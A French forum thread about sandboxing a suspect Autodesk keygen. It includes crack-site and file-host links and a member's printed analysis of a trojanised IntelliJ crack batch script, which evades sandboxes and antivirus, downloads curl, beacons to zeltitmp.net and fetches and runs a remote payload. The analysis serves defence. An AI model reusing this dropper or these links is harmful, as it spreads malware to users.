[QUESTION] Windows 10 et bac à sable : lequel prendre

Message par **PhilWEB** » il y a 4 mois

Bonsoir,
Ma version consumer de windows 10 ne comporte pas de bac à sable.
Cette option semble concerner uniquement la version business pro ? A confirmer.
J'ai donc installé sandboxie plus. v1.12.3
Je souhaite y tester le fichier build2024v4.13.25xf-WIN_677307.exe mais j'obtiens la fenêtre suivante au démarrage de sandboxie :
impossible d'appeler le programme P:DOWNLOAD\Programs\build2024v4.13.25xf-WIN_677307.exe
Code d'erreur système : Accès refusé (5)

Connaissez vous des bacs à sable pertinents me permettant de tester les fichiers hasardeux type cerises indigestes comme je le suppose pour le fichier à tester ?
J'ai soumis le fichier à virustotal.
EN voici le résultat : 15 alertes sur 65 produits de sécurité mais mon Bitdefender ne bronche pas
https://www.virustotal.com/gui/file/716 ... 0eebcb5c43

Voici le lien du fichier concerné à partir du site https://xforce-cracks.com/build-2024-keygen-macos-win/
https://megafilesdown.xyz/d/UHMHPGG?tit ... 3.25xf-WIN

Message par **LaDidi21** » il y a 4 mois

@PhilWEB :
La version courante est la 1.12.5.
Pour éviter les problèmes d'UAC, travaille à partir du C: et non d'un share P:

En anlyse "à plat", ton truc semble sain mais :

Un keygen de 2,7 Mo ? Ça parait un peu gros...
le VERSION_INFO est surprenant ("Sparkle" ?)
peu courant l'usage de EnumProcessModules() importé de PSapi.dll pour un keygen
avec une signature numérique EV valide de "Digital Media Pros LLC" ?

=> Hum...

A l'exécution,

bizarre la fenêtre "Launching..."
crashe sous SB, même en ADMIN

=> Hum, Hum ...

A tester, selon moi :

dans une VM,
ou sous debugger en VM ou sous SB.

mais, là, il est trop tard...

Message par **LaDidi21** » il y a 4 mois

@PhilWEB :
Quel est ton objectif quand tu écris "pertinents me permettant de tester les fichiers hasardeux type cerises indigestes" ?
Si tu penses qu'il suffit de valider un fonctionnement sain dans une VM, quelle qu'elle soit, pour garantir un fonctionnement aussi sain hors VM, tu te trompes lourdement !

Pour illuster, un crack pour IntelliJ IDEA codé par JB.
C'est un exe (Patch JB 2023.x.x.exe).
Après beaucoup de ménage, j'ai même galéré avec le .bat tellement il était, volontairement, "mal" écrit.
Bien évidemment, la 1ère partie fait bien le crack comme attendu mais la 2ème
Voilà le .bat final :

Code : Tout sélectionner

@shift
@echo off
set "osB=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osB=AMD64"
if "%osB%"=="x86" (
set "bits="
set "pf=%SystemDrive%\Program Files"
) else (
set "pf=%SystemDrive%\Program Files (x86)"
set "bits=/reg:32"
)
start "" ".\myfiles\7z2201.exe" /S
copy ".\myfiles\cnf" "%tmp%\cnf"
"%pf%\7-Zip\7z.exe" x ".\myfiles\jbk.7z" -o"%appdata%\JetBrains" -pkbmnvjckxjvksldpoxfkgjrd8t7fyvuejfolreg -y
"%pf%\7-Zip\7z.exe" x ".\myfiles\jb.7z" -o"%public%" -phjg87ryhfm9coiskdcvnggkulihjkgf -y
start "" "%public%\jetbra\scripts\VM.vbs"
echo Program successfully licensed! | msg *
REM rd ".\myfiles" /S /Q
set yn=23
for /f %%a in ('wmic path win2_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"
set Month=00%Month%
set Month=%Month:~-2%
set Year=00%Year%
set Year=%Year:~-2%
set dt=%Day%%Month%%Year%
set "cnfv=%tmp%\cnf"
for /f "usebackq delims=;" %%i in ("%cnfv%") do set %%~i
set "dt1v=%d1%%m1%%yn%"
set "dt2v=%d2%%m1%%yn%"
set "dt3v=%d3%%m1%%yn%"
if %dt% equ %dt1v% exit
if %dt% equ %dt2v% exit
if %dt% equ %dt3v% exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh') do set sb=%%~i
REM if "%sb%" equ "SbieSvc.exe" exit
reg query "HKLM\SOFTWARE\Microsoft\Alu" /s %bits%
REM if %ERRORLEVEL% equ 0 exit
reg Add "HKLM\SOFTWARE\Microsoft\Alu" /f %bits%
for /f "tokens=2*" %%a in (' reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName" ') do set vm1="%%b"
for /f "tokens=2*" %%a in (' reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName" ') do set vm2="%%b"
REM if %vm1% equ "KVM" exit
REM if %vm1% equ "VirtualBox" exit
REM if %vm2% equ "Virtual Machine" exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq ekrn.exe" /fo csv /nh') do set sb=%%~i

REM if "%sb%" equ "ekrn.exe" exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh') do set sb=%%~i
REM if "%sb%" equ "QHActiveDefense.exe" exit
dir /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"
REM if %ERRORLEVEL% equ 0 exit
dir  /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"
REM if %ERRORLEVEL% equ 0 exit
if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"
if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"
if not exist %windir%\System32\curl.exe exit
set "cnfv=%tmp%\cnf"
for /f "usebackq delims=;" %%i in ("%cnfv%") do set %%~i
set p1=%pid%
set s1=%sid%
for /f "tokens=* delims= " %%a in ('curl https://ipinfo.io/ip -k') do set "ei=%%~a"
for /f "tokens=* delims= " %%a in ('curl https://ipinfo.io/country -k') do set "ec=%%~a"
for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:"Windows %%i")&&(set es=%%i))
set didl=8
setlocal EnableDelayedExpansion EnableExtensions
for /f "tokens=* delims= " %%a in ('curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101" ') do set "aaajkbkdfkjlgjfdkljhg4df=%%~a"
set num_t=16
set "num_set=0123456789abcdef"
:grmd
set /a "rnd=%num_t%*%random%/32768"
set "ed=!num_set:~%rnd%,1!%ed%"
set /a "didl-=1"
if %didl% gtr 0 goto grmd
set /a rg1=(%random%%%100)+1
if %rg1% == 1 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36"
if %rg1% == 2 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36"
if %rg1% == 3 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36"
if %rg1% == 4 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5389.103 Safari/537.36"
if %rg1% == 5 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.94 Safari/537.36"
if %rg1% == 6 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5376.101 Safari/537.36"
if %rg1% == 7 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5382.189 Safari/537.36"
if %rg1% == 8 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5413.107 Safari/537.36"
if %rg1% == 9 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5368.189 Safari/537.36"
if %rg1% == 10 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5362.192 Safari/537.36"
if %rg1% == 11 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5409.100 Safari/537.36"
if %rg1% == 12 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.184 Safari/537.36"
if %rg1% == 13 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.123 Safari/537.36"
if %rg1% == 14 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5398.172 Safari/537.36"
if %rg1% == 15 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5369.183 Safari/537.36"
if %rg1% == 16 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5397.128 Safari/537.36"
if %rg1% == 17 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5360.113 Safari/537.36"
if %rg1% == 18 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5366.158 Safari/537.36"
if %rg1% == 19 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5377.163 Safari/537.36"
if %rg1% == 20 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5412.104 Safari/537.36"
if %rg1% == 21 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5381.188 Safari/537.36"
if %rg1% == 22 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5377.127 Safari/537.36"
if %rg1% == 23 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5412.141 Safari/537.36"
if %rg1% == 24 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5400.218 Safari/537.36"
if %rg1% == 25 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5389.144 Safari/537.36"
if %rg1% == 26 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5394.188 Safari/537.36"
if %rg1% == 27 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5374.109 Safari/537.36"
if %rg1% == 28 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5372.214 Safari/537.36"
if %rg1% == 29 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5375.114 Safari/537.36"
if %rg1% == 30 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5379.148 Safari/537.36"
if %rg1% == 31 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5384.178 Safari/537.36"

if %rg1% == 32 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5413.119 Safari/537.36"
if %rg1% == 33 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5363.107 Safari/537.36"
if %rg1% == 34 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5402.192 Safari/537.36"
if %rg1% == 35 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5387.129 Safari/537.36"
if %rg1% == 36 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5378.127 Safari/537.36"
if %rg1% == 37 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5376.182 Safari/537.36"
if %rg1% == 38 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5413.181 Safari/537.36"
if %rg1% == 39 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
if %rg1% == 40 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
if %rg1% == 41 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
if %rg1% == 42 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
if %rg1% == 43 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
if %rg1% == 44 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
if %rg1% == 45 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
if %rg1% == 46 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
if %rg1% == 47 set "uat=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
if %rg1% == 48 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"
if %rg1% == 49 set "uat=Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
if %rg1% == 50 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
if %rg1% == 51 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
if %rg1% == 52 set "uat=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
if %rg1% == 53 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
if %rg1% == 54 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
if %rg1% == 55 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
if %rg1% == 56 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
if %rg1% == 57 set "uat=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"
if %rg1% == 58 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
if %rg1% == 59 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
if %rg1% == 60 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
if %rg1% == 61 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
if %rg1% == 62 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"
if %rg1% == 63 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
if %rg1% == 64 set "uat=Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36"
if %rg1% == 65 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
if %rg1% == 66 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
if %rg1% == 67 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
if %rg1% == 68 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36"
if %rg1% == 69 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36"
if %rg1% == 70 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5404.195 Safari/537.36"
if %rg1% == 71 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5406.136 Safari/537.36 Edg/107.0.1356.58"
if %rg1% == 72 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.126 Safari/537.36 Edg/106.0.1405.38"
if %rg1% == 73 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.118 Safari/537.36 Edg/107.0.1361.34"
if %rg1% == 74 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5411.216 Safari/537.36 Edg/105.0.1335.45"
if %rg1% == 75 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.113 Safari/537.36 Edg/107.0.1319.46"
if %rg1% == 76 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5386.106 Safari/537.36 Edg/107.0.1386.41"
if %rg1% == 77 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5369.212 Safari/537.36 Edg/106.0.1348.62"
if %rg1% == 78 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5389.160 Safari/537.36 Edg/107.0.1392.54"
if %rg1% == 79 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5393.164 Safari/537.36 Edg/106.0.1316.50"
if %rg1% == 80 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5367.169 Safari/537.36 Edg/106.0.1255.35"
if %rg1% == 81 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5391.156 Safari/537.36 Edg/106.0.1410.38"
if %rg1% == 82 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5385.119 Safari/537.36 Edg/106.0.1307.48"
if %rg1% == 83 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:111.0esr) Gecko/20110101 Firefox/111.0esr/1eRGVZYTh7MVQQdH-42"
if %rg1% == 84 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/0YQoQM586xAWnBLv-34"
if %rg1% == 85 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:110.0) Gecko/20000101 Firefox/110.0"
if %rg1% == 86 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:111.0) Gecko/20000101 Firefox/111.0/E6JMACCRPdA-60"
if %rg1% == 87 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; rv:115.0esr) Gecko/20000101 Firefox/115.0esr"
if %rg1% == 88 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:122.0) Gecko/20000101 Firefox/122.0/BwNG2nOMlFk1Ty-74"
if %rg1% == 89 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0/BJjeDS91BS96-60"
if %rg1% == 90 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:123.0) Gecko/20010101 Firefox/123.0/ZEpxujxsW"
if %rg1% == 91 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5410.151 Safari/537.36 OPR/91.0.3813.69"
if %rg1% == 92 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5362.162 Safari/537.36 OPR/91.0.4257.198"
if %rg1% == 93 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5366.199 Safari/537.36 OPR/92.0.4268.62"
if %rg1% == 94 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5375.198 Safari/537.36 OPR/92.0.3668.33"
if %rg1% == 95 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5381.179 Safari/537.36 OPR/92.0.4013.24"
if %rg1% == 96 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5387.158 Safari/537.36 Edg/107.0.1259.44"
if %rg1% == 97 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5380.138 Safari/537.36 Edg/106.0.1246.39"
if %rg1% == 98 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5393.113 Safari/537.36 Edg/105.0.1266.61"
if %rg1% == 99 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:114.0) Gecko/20010101 Firefox/114.0/AEaeAgKauj6Ud"
if %rg1% == 100 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20010101 Firefox/119.0"

curl -k -o "%tmp%\cc.7z" -L "https://zeltitmp.net/pp/cc.7z" --user-agent "%uat%"
"%pf%\7-zip\7z.exe" x "%tmp%\cc.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y
if exist %tmp%\cc.bat powershell %tmp%\cc.bat
del %tmp%\cnf
del %tmp%\cc.7z

Message par **PhilWEB** » il y a 4 mois

@ladidi21
Merci pour ta réponse.
L'objectif est effectivement de tester une cerise dans un bac à sable pour voir si son comportement immédiat ne conduit pas à des dysfonctionnements.
Il est possible de récupérer ainsi par exemple un serial
Mais tu as entièrement raison pour un trojan dont le comportement immédiat (fournir une clé) est satisfaisant et qui ensuite se tapit pour agir bien plus tard pour foutre la zizanie, récupérer des données ou se servir du PC comme d'un hote.

Pour sandboxie, quand j'ai posté le message j'ai bien fait un tour sur le site officiel qui n'avait pas mis en ligne la version que tu indiques.
J'en reviens à l'instant et https://sandboxie-plus.com/downloads/ donne toujours la 1.12.3

Je vais examiner le fichier de commande bat que tu as mis à disposition pour voir si cela peut m'éclairer un peu mais je ne suis pas informaticien de métier.
J'ai appris le pascal en fac de maths il y a de cela maintenant à peu près 40 ans et j'utilise de temps à autres mais assez rarement delphi pour le développement de quelques applications techniques de calcul.
Si je comprends bien le fichier exemple fourni... qui comporte des parties non actives en commentaires

La partie 1 semble s'étendre jusqu'à la ligne 18
Définition de variables d'environnement en fonction de l'architecture matérielle du PC
Lancement de 7zip pour copie de fichiers utiles probablement pour lancer un script visual basic VM.vbs
destruction du répertoire d'installation temporaire mais commande rem devant -> remarque ? effacement non réalisé ?

Ligne 20 : for /f %%a in ('wmic path win2_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"
définition de variables temporelles sans les afficher >nul
set "cnfv=%tmp%\cnf"
for /f "usebackq delims=;" %%i in ("%cnfv%") do set %%~i
analyse les fichiers du répertoire cnfv et pour chacun de ces fichiers, définit plusieurs variables en fonction du contenu des fichiers par la séparation ;
lignes 28 à 33 : Controle de date je suppose avec sortie éventuelle du programme en cas de correspondance
lignes 34 à 35 vérification boite à sable ? SbieSvc.exe semble être un module de sandboxie
ligne 36 : reg query "HKLM\SOFTWARE\Microsoft\Alu" /s %bits%
recherche de toutes les clés de registre sous Alu de type octet ..
lignes 38 à 44 : tentative de contournement des systèmes virtuels et de remplacement de variables
ekrn.exe est associé au logiciel de sécurité ESET
lignes 46 à 52 : vérification des systèmes antivirus
ligne 53 : procedure d'installation du logiciel curl.exe qui permet de récupérer et envoyer des données ressources via des url
ensuite récupération des adresses IP de la machine
définition du navigateur
lignes 176 à la fin
récupération d'un fichier archive - décompression et exécution via powershell du fichier de commande concerné
Que fait réellement ce fichier ?
suppression des traces dans le répertoire temporaire

Message par **LaDidi21** » il y a 4 mois

@PhilWEB :
Tu utilises un snapshoter (RUP, Total Uninstall, ...) ou "Process Moinitor"pour récupérer le serial et/ou le crack ?

Concernant Sandboxie :
Arrête la beu ...
last week 1.12.5 : https://github.com/sandboxie-plus/Sandb ... es/latest/
ChangeLog :

Sandboxie a écrit :
[1.12.5 / 5.67.5] - 2023-12-19
...
[1.12.4 / 5.67.4] - 2023-12-18
...

Mon exemple :
L'exemple que j'ai donné est, juste, pour illustrer mon propos et n'a guère d'intérêt en soi.
J'ai ajouté les "REM" pour le faire tourner sous Sandbox.
La clé ALU est un flag pour dire "dèjà envoyé, chef".

Message par **PhilWEB** » il y a 4 mois

@ladidi21
N'étant pas programmeur ou informaticien, je ne fréquente pas github car je n'ai rien à y déposer ou à prendre comme code
Je vais sagement sur le site de l'éditeur voir où en est la version la plus récente. En suivant le lien de la version beta on accède effectivement à la toute dernière 1.12.5

La récupération se fait à la main

Message par **LaDidi21** » il y a 4 mois

@PhilWEB :
Si tu veux t'entrainer sur le patch pris en exemple :

Code : Tout sélectionner

TWL2.3C6D64786E216564696D2A696C6C65647E696D22323530323F227F647964 656F24766F637F24756E6E24616F6C63727F2F2A33707474786

Message par **LaDidi21** » il y a 4 mois

@PhilWEB :
Je n'aurais pas une grande confiance dans ton exe...
Il sort, sans rien faire, sous debugger sous SandBoxie => bizarre...
=> A bien tester sous VM mais je n'ai pas le temps.

Message par **PhilWEB** » il y a 4 mois

@ladidi21
Effectivement, j'ai des doutes sur l'inocuité de cet exe qui provient du site xforce-cracks.com censé fournir les maj des vénérables cerises accompagnant les produits autodesk en licences autonomes
Merci pour ton aide et bonnes préparations de fêtes de fin d'année

[QUESTION] Windows 10 et bac à sable : lequel prendre

[QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Re: [QUESTION] Windows 10 et bac à sable : lequel prendre

Qui est en ligne